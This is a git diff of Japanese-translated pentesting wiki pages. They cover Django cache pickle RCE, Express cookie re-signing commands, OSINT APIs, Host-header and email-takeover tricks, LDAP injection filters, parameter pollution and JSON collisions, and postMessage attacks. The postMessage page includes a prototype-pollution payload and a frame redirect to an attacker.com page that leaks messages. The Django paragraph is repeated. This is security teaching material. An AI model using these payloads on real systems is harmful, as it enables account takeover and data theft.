Djangoのキャッシュは、[Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12)、[メモリ](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16)、[ファイル](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16)、または[データベース](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95)のいずれかに保存されます。Redisサーバーまたはデータベースに保存されたキャッシュは、最も攻撃の標的になりやすいRedisインジェクションおよびSQLインジェクションですが、攻撃者はファイルベースのキャッシュを使用して任意の書き込みをRCEに変えることもできるかもしれません。メンテナはこれを非問題としてマークしています。キャッシュファイルフォルダー、SQLテーブル名、およびRedisサーバーの詳細は、実装に基づいて異なることに注意することが重要です。
## キャッシュ操作によるRCE
Djangoのデフォルトのキャッシュストレージ方法は[Pythonピクルス](https://docs.python.org/3/library/pickle.html)であり、[信頼できない入力がアンピクルされる](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf)とRCEにつながる可能性があります。**攻撃者がキャッシュへの書き込みアクセスを取得できれば、この脆弱性を基盤となるサーバーでのRCEにエスカレートさせることができます**。
このHackerOneレポートは、SQLiteデータベースに保存されたDjangoキャッシュを悪用する素晴らしい再現可能な例を提供しています: https://hackerone.com/reports/1415436
Djangoのキャッシュは、[Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12)、[メモリ](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16)、[ファイル](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16)、または[データベース](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95)のいずれかに保存されます。Redisサーバーやデータベースに保存されたキャッシュは、最も攻撃の標的になりやすいRedisインジェクションやSQLインジェクションですが、攻撃者はファイルベースのキャッシュを利用して任意の書き込みをRCEに変えることもできるかもしれません。メンテナはこれを非問題としてマークしています。キャッシュファイルフォルダー、SQLテーブル名、Redisサーバーの詳細は、実装に基づいて異なることに注意することが重要です。
このHackerOneのレポートは、SQLiteデータベースに保存されたDjangoキャッシュを悪用する素晴らしい再現可能な例を提供しています: https://hackerone.com/reports/1415436
{{#include /banners/hacktricks-training.md}}

1
src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
View File

@ -1 +0,0 @@
# GWT - Google Web Toolkit

8
src/network-services-pentesting/pentesting-web/nodejs-express.md
View File

@ -1,10 +1,12 @@
# NodeJS Express
{{#include /banners/hacktricks-training.md}}
## Cookie Signature
ツール [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) は、Express.js のクッキーシークレットのテストと再署名を自動化するためのユーティリティです。
### 特定の名前の単一クッキー
### 特定の名前を持つ単一のクッキー
```bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
```
@ -22,8 +24,8 @@ cookie-monster -b -f cookies.json -w custom.lst
```
### 新しいクッキーをエンコードして署名する
秘密を知っていれば、クッキーに署名できます。
秘密を知っていれば、クッキーに署名することができます。
```bash
cookie-monster -e -f new_cookie.json -k secret
```
{{#include /banners/hacktricks-training.md}}

121
src/online-platforms-with-api.md
View File

@ -1,121 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
# [ProjectHoneypot](https://www.projecthoneypot.org/)
IPが疑わしい/悪意のある活動に関連しているかどうかを尋ねることができます。完全に無料です。
# [**BotScout**](http://botscout.com/api.htm)
IPアドレスがアカウントを登録するボットに関連しているかどうかを確認します。ユーザー名やメールアドレスも確認できます。最初は無料です。
# [Hunter](https://hunter.io/)
メールを見つけて確認します。
一部のAPIリクエストは無料ですが、より多くは支払いが必要です。
商業用?
# [AlientVault](https://otx.alienvault.com/api)
IPやドメインに関連する悪意のある活動を見つけます。無料です。
# [Clearbit](https://dashboard.clearbit.com/)
メールに関連する個人データ(他のプラットフォームのプロフィール)、ドメイン(基本的な会社情報、メール、従業員)、および会社(メールから会社情報を取得)を見つけます。
すべての可能性にアクセスするには支払いが必要です。
商業用?
# [BuiltWith](https://builtwith.com/)
ウェブサイトで使用されている技術。高価です...
商業用?
# [Fraudguard](https://fraudguard.io/)
ホストドメインまたはIPが疑わしい/悪意のある活動に関連しているかどうかを確認します。いくつかの無料APIアクセスがあります。
商業用?
# [FortiGuard](https://fortiguard.com/)
ホストドメインまたはIPが疑わしい/悪意のある活動に関連しているかどうかを確認します。いくつかの無料APIアクセスがあります。
# [SpamCop](https://www.spamcop.net/)
ホストがスパム活動に関連しているかどうかを示します。いくつかの無料APIアクセスがあります。
# [mywot](https://www.mywot.com/)
意見や他の指標に基づいて、ドメインが疑わしい/悪意のある情報に関連しているかどうかを取得します。
# [ipinfo](https://ipinfo.io/)
IPアドレスから基本情報を取得します。月に最大100Kまでテストできます。
# [securitytrails](https://securitytrails.com/app/account)
このプラットフォームは、IP内のドメインやドメインサーバー内のドメイン、メールに関連するドメイン関連するドメインを見つける、ドメインのIP履歴CloudFlareの背後にあるホストを見つける、すべてのドメインが使用しているネームサーバーなどの情報を提供します。
いくつかの無料アクセスがあります。
# [fullcontact](https://www.fullcontact.com/)
メール、ドメイン、または会社名で検索し、関連する「個人」情報を取得します。メールの確認もできます。いくつかの無料アクセスがあります。
# [RiskIQ](https://www.spiderfoot.net/documentation/)
ドメインやIPに関する多くの情報が、無料/コミュニティ版でも得られます。
# [\_IntelligenceX](https://intelx.io/)
ドメイン、IP、メールを検索し、ダンプから情報を取得します。いくつかの無料アクセスがあります。
# [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
IPで検索し、疑わしい活動に関連する情報を収集します。いくつかの無料アクセスがあります。
# [Greynoise](https://viz.greynoise.io/)
IPまたはIP範囲で検索し、インターネットをスキャンしているIPに関する情報を取得します。15日間の無料アクセスがあります。
# [Shodan](https://www.shodan.io/)
IPアドレスのスキャン情報を取得します。いくつかの無料APIアクセスがあります。
# [Censys](https://censys.io/)
Shodanに非常に似ています。
# [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
キーワードで検索してオープンなS3バケットを見つけます。
# [Dehashed](https://www.dehashed.com/data)
メールやドメインの漏洩した資格情報を見つけます。
商業用?
# [psbdmp](https://psbdmp.ws/)
メールが表示されたペーストビンを検索します。商業用?
# [emailrep.io](https://emailrep.io/key)
メールの評判を取得します。商業用?
# [ghostproject](https://ghostproject.fr/)
漏洩したメールからパスワードを取得します。商業用?
# [Binaryedge](https://www.binaryedge.io/)
IPから興味深い情報を取得します。
# [haveibeenpwned](https://haveibeenpwned.com/)
ドメインやメールで検索し、それが侵害されたかどうかとパスワードを取得します。商業用?
[https://dnsdumpster.com/](https://dnsdumpster.com/)(商業ツール内?)
[https://www.netcraft.com/](https://www.netcraft.com/)(商業ツール内?)
[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/)(商業ツール内?)
{{#include ./banners/hacktricks-training.md}}

41
src/other-web-tricks.md
View File

@ -1,41 +0,0 @@
# Other Web Tricks
{{#include ./banners/hacktricks-training.md}}
### Host header
バックエンドは、いくつかのアクションを実行するために**Host header**を信頼することがあります。たとえば、**パスワードリセットを送信するドメイン**としてその値を使用することがあります。したがって、パスワードリセットのリンクを含むメールを受け取ったとき、使用されるドメインはHost headerに入力したものです。その後、他のユーザーのパスワードリセットを要求し、ドメインを自分が制御するものに変更して、彼らのパスワードリセットコードを盗むことができます。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
> [!WARNING]
> ユーザーがリセットパスワードリンクをクリックするのを待つ必要がない可能性があることに注意してください。おそらく、**スパムフィルターや他の中間デバイス/ボットがそれをクリックして分析することがあります**。
### Session booleans
時々、いくつかの検証を正しく完了すると、バックエンドは**セキュリティ属性に「True」という値のブール値を追加するだけです**。その後、別のエンドポイントは、そのチェックに成功したかどうかを知ることができます。\
ただし、**チェックに合格**し、セキュリティ属性に「True」値が付与された場合、**同じ属性に依存する他のリソースにアクセスしようとすることができますが、アクセス権がないはずです**。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
### Register functionality
既存のユーザーとして登録を試みてください。また、同等の文字ドット、たくさんのスペース、Unicodeを使用してみてください。
### Takeover emails
メールを登録し、確認する前にメールを変更します。次に、新しい確認メールが最初に登録したメールに送信されると、任意のメールを乗っ取ることができます。また、最初のメールを確認するために2番目のメールを有効にできる場合も、任意のアカウントを乗っ取ることができます。
### Access Internal servicedesk of companies using atlassian
{{#ref}}
https://yourcompanyname.atlassian.net/servicedesk/customer/user/login
{{#endref}}
### TRACE method
開発者は、プロダクション環境でさまざまなデバッグオプションを無効にするのを忘れることがあります。たとえば、HTTP `TRACE`メソッドは診断目的で設計されています。これが有効になっている場合、Webサーバーは`TRACE`メソッドを使用したリクエストに対して、受信した正確なリクエストを応答にエコーします。この動作は通常無害ですが、時折、リバースプロキシによってリクエストに追加される内部認証ヘッダーの名前など、情報漏洩につながることがあります。![Image for post](https://miro.medium.com/max/60/1*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
{{#include ./banners/hacktricks-training.md}}
### Same-Site Scripting
特定のDNS設定ミスにより、localhostまたは127.0.0.1に解決されるドメインまたはサブドメインに遭遇したときに発生します。これにより、攻撃者はRFC2109HTTP State Management Mechanismの同一オリジン制限を回避し、したがって状態管理データをハイジャックすることができます。また、クロスサイトスクリプティングを許可する可能性もあります。詳細については[こちら](https://seclists.org/bugtraq/2008/Jan/270)をお読みください。

9
src/pentesting-dns.md
View File

@ -1,9 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
**DNSへの攻撃についてさらに調査する**
**DNSSECとDNSSEC3**
**IPv6におけるDNS**
{{#include ./banners/hacktricks-training.md}}

40
src/pentesting-web/ldap-injection.md
View File

@ -1,10 +1,8 @@
# LDAP Injection
## LDAP Injection
# LDAPインジェクション
{{#include ../banners/hacktricks-training.md}}
## LDAP Injection
## LDAPインジェクション
### **LDAP**
@ -14,27 +12,27 @@
../network-services-pentesting/pentesting-ldap.md
{{#endref}}
**LDAP Injection**は、ユーザー入力からLDAPステートメントを構築するウェブアプリケーションを対象とした攻撃です。アプリケーションが入力を**適切にサニタイズしない**場合に発生し、攻撃者がローカルプロキシを通じて**LDAPステートメントを操作**できるようになり、無許可のアクセスやデータ操作につながる可能性があります。
**LDAPインジェクション**は、ユーザー入力からLDAPステートメントを構築するウェブアプリケーションを対象とした攻撃です。アプリケーションが入力を**適切にサニタイズ**しない場合に発生し、攻撃者がローカルプロキシを通じて**LDAPステートメントを操作**できるようになり、無許可のアクセスやデータ操作につながる可能性があります。
{{#file}}
EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
{{#endfile}}
**Filter** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**フィルター** = ( filtercomp )\
**フィルターコンポ** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = Absolute TRUE\
**(|)** = Absolute FALSE
**フィルターリスト** = 1\*filter\
**アイテム**= simple / present / substring\
**シンプル** = attr filtertype assertionvalue\
**フィルタータイプ** = _'=' / '\~=' / '>=' / '<='_\
**プレゼント** = attr = \*\
**サブストリング** = attr ”=” \[initial] \* \[final]\
**初期** = assertionvalue\
**最終** = assertionvalue\
**(&)** = 絶対TRUE\
**(|)** = 絶対FALSE
例えば:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
@ -43,10 +41,10 @@ EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
データベースにアクセスでき、これにはさまざまなタイプの情報が含まれる可能性があります。
**OpenLDAP**: 2つのフィルターが到着した場合、最初のフィルターのみを実行します。\
**ADAMまたはMicrosoft LDS**: 2つのフィルターエラーが発生します。\
**ADAMまたはMicrosoft LDS**: 2つのフィルターがあるとエラーが発生します。\
**SunOne Directory Server 5.0**: 両方のフィルターを実行します。
**フィルターは正しい構文で送信することが非常に重要です。さもなければエラーが発生します。フィルターは1つだけ送信する方が良いです。**
**正しい構文でフィルターを送信することが非常に重要です。さもなければエラーが発生します。フィルターは1つだけ送信する方が良いです。**
フィルターは次のように始まる必要があります: `&` または `|`\
例: `(&(directory=val1)(folder=public))`
@ -56,7 +54,7 @@ EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
次に: `(&(objectClass=`**`*)(ObjectClass=*))`** が最初のフィルター(実行されるもの)になります。
### Login Bypass
### ログインバイパス
LDAPは、パスワードを保存するためのいくつかの形式をサポートしています: clear, md5, smd5, sh1, sha, crypt。したがって、パスワードに何を挿入しても、ハッシュ化される可能性があります。
```bash
@ -150,7 +148,7 @@ ascii文字、数字、記号を繰り返し処理できます:
#### **有効なLDAPフィールドを発見する**
LDAPオブジェクトは**デフォルトでいくつかの属性を含んでおり**、それを使って**情報を保存する**ことができます。**それらすべてをブルートフォースして情報を抽出する**ことを試みることができます。 [**デフォルトのLDAP属性のリストはこちら**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)で見つけることができます。
LDAPオブジェクトは**デフォルトでいくつかの属性を含んでおり**、それを使って**情報を保存する**ことができます。**それらすべてをブルートフォースして情報を抽出する**ことを試みることができます。[**デフォルトのLDAP属性のリストはこちら**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)で見つけることができます。
```python
#!/usr/bin/python3
import requests

60
src/pentesting-web/parameter-pollution.md
View File

@ -1,12 +1,10 @@
# パラメータ汚染 | JSONインジェクション
## パラメータ汚染
{{#include ../banners/hacktricks-training.md}}
## HTTPパラメータ汚染 (HPP) 概要
HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作して、ウェブアプリケーションの動作を意図しない方法で変更する技術です。この操作は、HTTPパラメータを追加、変更、または複製することによって行われます。これらの操作の影響はユーザーには直接見えませんが、サーバー側のアプリケーションの機能を大きく変更し、クライアント側に観察可能な影響を与えることがあります。
HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作して、Webアプリケーションの動作を意図しない方法で変更する技術です。この操作は、HTTPパラメータを追加、変更、または複製することによって行われます。これらの操作の影響はユーザーには直接見えませんが、サーバー側のアプリケーションの機能を大きく変更し、クライアント側に観察可能な影響を与えることがあります。
### HTTPパラメータ汚染 (HPP) の例
@ -14,15 +12,15 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
- **元のURL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000`
追加の`from`パラメータを挿入することによって:
追加の `from` パラメータを挿入することによって:
- **操作されたURL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
取引は`accountA`ではなく`accountC`に誤って請求される可能性があり、HPPが取引やパスワードリセット、2FA設定、APIキーリクエストなどの他の機能を操作する可能性を示しています。
取引は `accountA` ではなく `accountC` に誤って請求される可能性があり、HPPが取引やパスワードリセット、2FA設定、APIキーリクエストなどの他の機能を操作する可能性を示しています。
#### **技術特有のパラメータ解析**
- パラメータが解析され、優先される方法は、基盤となるウェブ技術によって異なり、HPPがどのように悪用されるかに影響を与えます。
- パラメータが解析され、優先される方法は、基盤となるWeb技術によって異なり、HPPがどのように悪用されるかに影響します。
- [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) のようなツールは、これらの技術とその解析動作を特定するのに役立ちます。
### PHPとHPPの悪用
@ -30,46 +28,46 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
**OTP操作ケース:**
- **コンテキスト:** ワンタイムパスワード (OTP) を必要とするログインメカニズムが悪用されました。
- **方法:** Burp Suiteのようなツールを使用してOTPリクエストを傍受し、攻撃者はHTTPリクエスト内の`email`パラメータを複製しました。
- **方法:** Burp Suiteのようなツールを使用してOTPリクエストを傍受し、攻撃者はHTTPリクエスト内の `email` パラメータを複製しました。
- **結果:** 初期のメール用に意図されたOTPが、操作されたリクエストで指定された2番目のメールアドレスに送信されました。この欠陥により、意図されたセキュリティ対策を回避して不正アクセスが可能になりました。
このシナリオは、OTP生成のために最初の`email`パラメータを処理したが、配信には最後のものを使用したアプリケーションのバックエンドの重大な見落としを強調しています。
このシナリオは、OTP生成のために最初の `email` パラメータを処理したが、配信には最後のものを使用したアプリケーションのバックエンドの重大な見落としを強調しています。
**APIキー操作ケース:**
- **シナリオ:** アプリケーションは、ユーザーがプロフィール設定ページを通じてAPIキーを更新できるようにしています。
- **攻撃ベクトル:** 攻撃者は、POSTリクエストに追加の`api_key`パラメータを追加することで、APIキー更新機能の結果を操作できることを発見しました。
- **技術:** Burp Suiteのようなツールを利用して、攻撃者は1つの正当な`api_key`パラメータと1つの悪意のある`api_key`パラメータを含むリクエストを作成します。サーバーは最後の出現のみを処理し、攻撃者が提供した値にAPIキーを更新します。
- **攻撃ベクトル:** 攻撃者は、POSTリクエストに追加の `api_key` パラメータを追加することで、APIキー更新機能の結果を操作できることを発見しました。
- **技術:** Burp Suiteのようなツールを利用して、攻撃者は1つの正当な `api_key` パラメータと1つの悪意のある `api_key` パラメータを含むリクエストを作成します。サーバーは最後の出現のみを処理し、攻撃者が提供した値にAPIキーを更新します。
- **結果:** 攻撃者は被害者のAPI機能を制御し、プライベートデータに不正にアクセスまたは変更する可能性があります。
この例は、特にAPIキー管理のような重要な機能における安全なパラメータ処理の必要性をさらに強調しています。
この例は、特にAPIキー管理のような重要な機能において、安全なパラメータ処理の必要性をさらに強調しています。
### パラメータ解析: Flask vs. PHP
ウェブ技術が重複したHTTPパラメータを処理する方法は異なり、HPP攻撃に対する脆弱性に影響を与えます:
Web技術が重複したHTTPパラメータを処理する方法は異なり、HPP攻撃に対する脆弱性に影響を与えます:
- **Flask:** クエリ文字列`a=1&a=2`のように、最初に遭遇したパラメータ値を採用し、初期のインスタンスを後続の重複よりも優先します。
- **PHP (Apache HTTPサーバー上):** 逆に、最後のパラメータ値を優先し、与えられた例では`a=2`を選択します。この動作は、攻撃者が操作したパラメータを元のものよりも優先することによって、HPPの悪用を無意識に助長する可能性があります。
- **Flask:** クエリ文字列 `a=1&a=2` のように、最初に遭遇したパラメータ値を採用し、初期のインスタンスを後続の重複よりも優先します。
- **PHP (Apache HTTPサーバー上):** 逆に、最後のパラメータ値を優先し、与えられた例では `a=2` を選択します。この動作は、攻撃者が操作したパラメータを元のものよりも優先することによって、HPPの悪用を無意識に助長する可能性があります。
## 技術によるパラメータ汚染
結果は[https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)から取得されました。
結果は [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89) から取得されました。
### PHP 8.3.11 および Apache 2.4.62 <a href="#id-9523" id="id-9523"></a>
<figure><img src="../images/image (1255).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg</a></p></figcaption></figure>
1. パラメータ名の後の%00を無視します。
2. name\[]を配列として処理します。
3. \_GETはGETメソッドを意味しません。
1. パラメータ名の %00 以降は無視します。
2. name\[] を配列として処理します。
3. \_GET はGETメソッドを意味しません。
4. 最後のパラメータを優先します。
### Ruby 3.3.5 および WEBrick 1.8.2
<figure><img src="../images/image (1257).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*kKxtZ8qEmgTIMS81py5hhg.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*kKxtZ8qEmgTIMS81py5hhg.jpeg</a></p></figcaption></figure>
1. &および;区切り文字を使用してパラメータを分割します。
2. name\[]は認識されません。
1. & と ; の区切り文字を使用してパラメータを分割します。
2. name\[] は認識されません。
3. 最初のパラメータを優先します。
### Spring MVC 6.0.23 および Apache Tomcat 10.1.30 <a href="#dd68" id="dd68"></a>
@ -77,44 +75,44 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
<figure><img src="../images/image (1258).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*llG22MF1gPTYZYFVCmCiVw.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*llG22MF1gPTYZYFVCmCiVw.jpeg</a></p></figcaption></figure>
1. POST RequestMapping == PostMapping & GET RequestMapping == GetMapping。
2. POST RequestMapping & PostMappingはname\[]を認識します。
3. nameとname\[]が存在する場合はnameを優先します。
2. POST RequestMapping & PostMapping name\[] を認識します。
3. name name\[] が存在する場合は name を優先します。
4. パラメータを連結します。例: first,last。
5. POST RequestMapping & PostMappingはContent-Typeを持つクエリパラメータを認識します。
5. POST RequestMapping & PostMapping Content-Type を持つクエリパラメータを認識します。
### **NodeJS** 20.17.0 **および** Express 4.21.0 <a href="#id-6d72" id="id-6d72"></a>
<figure><img src="../images/image (1259).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg</a></p></figcaption></figure>
1. name\[]を認識します。
1. name\[] を認識します。
2. パラメータを連結します。例: first,last。
### GO 1.22.7 <a href="#id-63dc" id="id-63dc"></a>
<figure><img src="../images/image (1260).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NVvN1N8sL4g_Gi796FzlZA.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NVvN1N8sL4g_Gi796FzlZA.jpeg</a></p></figcaption></figure>
1. name\[]は認識されません。
1. name\[] は認識されません。
2. 最初のパラメータを優先します。
### Python 3.12.6 および Werkzeug 3.0.4 および Flask 3.0.3 <a href="#b853" id="b853"></a>
<figure><img src="../images/image (1261).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*Se5467PFFjIlmT3O7KNlWQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*Se5467PFFjIlmT3O7KNlWQ.jpeg</a></p></figcaption></figure>
1. name\[]は認識されません。
1. name\[] は認識されません。
2. 最初のパラメータを優先します。
### Python 3.12.6 および Django 4.2.15 <a href="#id-8079" id="id-8079"></a>
<figure><img src="../images/image (1262).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rf38VXut5YhAx0ZhUzgT8Q.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rf38VXut5YhAx0ZhUzgT8Q.jpeg</a></p></figcaption></figure>
1. name\[]は認識されません。
1. name\[] は認識されません。
2. 最後のパラメータを優先します。
### Python 3.12.6 および Tornado 6.4.1 <a href="#id-2ad8" id="id-2ad8"></a>
<figure><img src="../images/image (1263).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*obCn7xahDc296JZccXM2qQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*obCn7xahDc296JZccXM2qQ.jpeg</a></p></figcaption></figure>
1. name\[]は認識されません。
1. name\[] は認識されません。
2. 最後のパラメータを優先します。
## JSONインジェクション
@ -127,7 +125,7 @@ obj = {"test": "user", "test": "admin"}
### キー衝突: 文字の切り捨てとコメント
特定の文字はフロントエンドによって正しく解釈されませんが、バックエンドはそれらを解釈し、これらのキーを使用します。これは**特定の制限を回避する**のに役立つかもしれません:
特定の文字はフロントエンドによって正しく解釈されないかもしれませんが、バックエンドはそれらを解釈し、これらのキーを使用します。これは**特定の制限を回避する**のに役立つかもしれません:
```json
{"test": 1, "test\[raw \x0d byte]": 2}
{"test": 1, "test\ud800": 2}
@ -136,7 +134,7 @@ obj = {"test": "user", "test": "admin"}
```
これらのケースでは、フロントエンドが `test == 1` と考え、バックエンドが `test == 2` と考える可能性があることに注意してください。
これを使用して、次のような値の制限を回避することもできます:
これは、次のような値の制限を回避するためにも使用できます:
```json
{"role": "administrator\[raw \x0d byte]"}
{"role":"administrator\ud800"}
@ -187,7 +185,7 @@ obj.toString() // {"test": 2}
```undefined
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
```
複数の表現にデコードできます。これには次のものが含まれます:
複数の表現にデコードできます。これには以下が含まれます:
```undefined
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95

34
src/pentesting-web/postmessage-vulnerabilities/README.md
View File

@ -1,12 +1,10 @@
# PostMessageの脆弱性
## PostMessageの脆弱性
{{#include ../../banners/hacktricks-training.md}}
## **PostMessage**を送信
**PostMessage**はメッセージを送信するために以下の関数を使用します:
**PostMessage**はメッセージを送信するために以下の関数を使用します:
```bash
targetWindow.postMessage(message, targetOrigin, [transfer]);
@ -34,12 +32,12 @@ win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
**targetOrigin** は '\*' または _https://company.com_ のような URL である可能性があります。\
**第二のシナリオ**では、**メッセージはそのドメインにのみ送信される**(ウィンドウオブジェクトのオリジンが異なっていても)。\
**ワイルドカード**が使用される場合、**メッセージは任意のドメインに送信される可能性があり**、ウィンドウオブジェクトのオリジンに送信されます。
**ワイルドカード**が使用される、**メッセージは任意のドメインに送信される可能性があり**、ウィンドウオブジェクトのオリジンに送信されます。
### iframe 攻撃 & **targetOrigin** のワイルドカード
[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**iframed** 可能なページ(`X-Frame-Header` 保護なし)を見つけ、**ワイルドカード**\*)を使用して **postMessage** 経由で **機密** メッセージを **送信している** 場合、**iframe** の **origin****変更** し、あなたが制御するドメインに **機密** メッセージを **漏洩** させることができます。\
ページが iframed 可能であるが、**targetOrigin** が **ワイルドカードではなく URL に設定されている** 場合、この **トリックは機能しません**
[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**iframed** 可能なページ(`X-Frame-Header` 保護なし)を見つけ、**ワイルドカード**\*)を使用して **postMessage** 経由で **機密** メッセージを **送信している** 場合、**iframe** の **origin****変更** し、**機密** メッセージをあなたが制御するドメインに **漏洩** させることができます。\
ページが iframed 可能でも、**targetOrigin** が **URL に設定されていてワイルドカードでない場合**、この **トリックは機能しません**
```html
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -57,7 +55,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
## addEventListenerの悪用
**`addEventListener`** は、JSが**`postMessages`**を期待する関数を宣言するために使用する関数です。\
のようなコードが使用されます:
以下のようなコードが使用されます:
```javascript
window.addEventListener(
"message",
@ -69,7 +67,7 @@ if (event.origin !== "http://example.org:8080") return
false
)
```
注意すべきは、**最初に**コードが行っていることは**オリジンの確認**です。これは、受信した情報で**何か敏感なこと**(パスワードの変更など)を行う場合に非常に**重要**です。**オリジンを確認しないと、攻撃者が被害者に任意のデータをこのエンドポイントに送信させ、被害者のパスワードを変更させることができます**(この例では)。
注意すべきは、**最初に**コードが**オリジンを確認している**ことです。これは、受信した情報で**何か敏感なこと**(パスワードの変更など)を行う場合に非常に**重要**です。**オリジンを確認しないと、攻撃者が被害者に任意のデータをこのエンドポイントに送信させ、被害者のパスワードを変更させることができます**(この例では)。
### 列挙
@ -84,11 +82,11 @@ false
![](<../../images/image (396).png>)
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta)や[https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)のような**ブラウザ拡張機能**を使用する。これらのブラウザ拡張機能は、**すべてのメッセージを傍受**し、表示します。
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta)や[https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)のような**ブラウザ拡張機能**を使用する。このブラウザ拡張機能は、**すべてのメッセージを傍受**し、表示します。
### オリジンチェックのバイパス
- **`event.isTrusted`**属性は、真のユーザーアクションによって生成されたイベントに対してのみ`True`を返すため、安全と見なされます。正しく実装されていればバイパスは難しいですが、セキュリティチェックにおけるその重要性は注目に値します。
- **`event.isTrusted`**属性は、ユーザーの正当なアクションによって生成されたイベントに対してのみ`True`を返すため、安全と見なされます。正しく実装されていればバイパスは難しいですが、セキュリティチェックにおけるその重要性は注目に値します。
- PostMessageイベントでのオリジン検証に**`indexOf()`**を使用することは、バイパスされる可能性があります。この脆弱性を示す例は次のとおりです:
```javascript
@ -101,8 +99,8 @@ false
"https://www.safedomain.com".search("www.s.fedomain.com")
```
- **`match()`**関数は、`search()`と同様に正規表現を処理します。正規表現が不適切に構造化されていると、バイパスされる可能性があります。
